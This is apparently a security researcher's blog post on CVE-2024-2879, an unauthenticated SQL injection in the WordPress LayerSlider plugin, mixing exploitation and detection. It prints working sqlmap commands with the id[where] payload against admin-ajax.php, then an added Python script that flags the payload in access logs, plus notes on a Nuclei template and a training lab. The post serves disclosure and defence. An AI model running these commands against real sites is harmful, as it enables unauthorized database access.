CVE-2024-2879 - WordPress Plugin LayerSlider - Unauthenticated SQL Injection

Earlier today I was tasked with trying to show how CVE-2024-2879 could be exploited, and this investigation led to the following blog post being created at Security Blue Team.

The CVE itself didn't have a PoC online that I could find, and though I did find snippets of how it worked, there was nothing specific enough to show any dumping of data or actual access to the database. I couldn't even find a working sleep! I found the following, which I was able to follow along with in my own environment, and the vulnerability made sense; the only bit missing was the exploitation to show impact. Show me that data!

After a bit of fiddling I decided to hand it to sqlmap before settling in to watch the MySQL general log whilst doing more manual testing. I was surprised to see the following worked:

sqlmap "http://<ip>/wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)" --level=3 --risk=2

I've created a video showing the steps of finding the plugin with wpscan and exploiting it with sqlmap, but there is nothing too exciting here, just standard stuff:

It'd be better to use the following, which pins sqlmap to the id[where] parameter and to time-based blind injection (--technique=T), so it doesn't waste requests testing the wrong parameter or trying other injection techniques:

sqlmap "http://<ip>/wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)" --level=3 --risk=2 -p "id[where]" --technique=T

For more information on detection and how this all works, I recommend checking the post I helped write earlier here, or this one for a more developer-focused insight.
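The requests above leave an obvious trace in the web-server access log: a call to admin-ajax.php with action=ls_get_popup_markup where the id parameter arrives as a PHP-style array (id[where]=...) instead of a plain numeric ID. The following is an added example, not code from the original post or from the LayerSlider project, that scans combined-format access log lines for exactly that pattern; the log lines embedded in it are constructed for the example, not captured traffic, and the "sqlmap" user-agent check relies on sqlmap's default User-Agent string, which is easily changed by an attacker (a hit on id[where] alone is the reliable signal). Affected versions are LayerSlider 7.9.11 through 7.10.0; 7.10.1 fixed the issue, so a hit against a patched site is a probe, not a compromise.

```python
"""Flag CVE-2024-2879 (LayerSlider ls_get_popup_markup) probing in access logs.

Added example, not part of the original post. Sample log lines are
constructed for the demonstration.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Apache/nginx "combined" format:
# host ident user [time] "METHOD TARGET PROTO" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Constructed sample: one benign popup request, the payload from the post
# (with the brackets URL-encoded, as a browser or sqlmap would send them),
# the same payload carrying sqlmap's default User-Agent, and an unrelated
# admin-ajax action that must not be flagged.
SAMPLE_LOG = """\
203.0.113.10 - - [10/Apr/2024:09:12:01 +0000] "GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id=3 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.10 - - [10/Apr/2024:09:12:05 +0000] "GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id%5Bwhere%5D=1) HTTP/1.1" 200 0 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Apr/2024:09:13:44 +0000] "GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id%5Bwhere%5D=1) HTTP/1.1" 200 0 "-" "sqlmap/1.8#stable (https://sqlmap.org)"
192.0.2.22 - - [10/Apr/2024:09:14:10 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 33 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Parse one combined-format line; return a dict or None if it doesn't match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    parts = urlsplit(entry["target"])
    entry["path"] = parts.path
    # parse_qs percent-decodes keys, so id%5Bwhere%5D becomes the key "id[where]".
    entry["query"] = parse_qs(parts.query, keep_blank_values=True)
    return entry


def classify(entry):
    """Return the reasons a request looks like CVE-2024-2879 probing (empty if benign)."""
    reasons = []
    if entry is None or not entry["path"].endswith("/wp-admin/admin-ajax.php"):
        return reasons
    q = entry["query"]
    if q.get("action", [""])[0] != "ls_get_popup_markup":
        return reasons
    # The vulnerable handler expects a numeric id; an array form such as
    # id[where] is what reaches the SQL query, so any id[...] key is a hit.
    array_keys = sorted(k for k in q if k.startswith("id["))
    if array_keys:
        reasons.append("id passed as array: " + ", ".join(array_keys))
    for value in q.get("id", []):
        if not value.isdigit():
            reasons.append(f"non-numeric id: {value!r}")
    # Weak, corroborating signal only: sqlmap's default UA is trivially spoofed.
    if "sqlmap" in entry["ua"].lower():
        reasons.append("sqlmap user-agent")
    return reasons


def scan(log_text):
    """Return (ip, time, reasons) for every flagged line in the log text."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        reasons = classify(entry)
        if reasons:
            hits.append((entry["ip"], entry["time"], reasons))
    return hits


if __name__ == "__main__":
    for ip, when, reasons in scan(SAMPLE_LOG):
        print(f"{when} {ip}: {'; '.join(reasons)}")
```

Run it against a real access.log by reading the file into scan(); the same id[...] check can be lifted into a WAF or SIEM rule, since the legitimate plugin front-end only ever sends a plain numeric id for this action.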

Update: 10th April

  • My PR for the Nuclei template was merged; it can be found here, so you'll now find it as part of your scans.
  • Take a look at the artifacts left behind by an attack in the lab I created for Blue Team Labs Online, called PlugOut.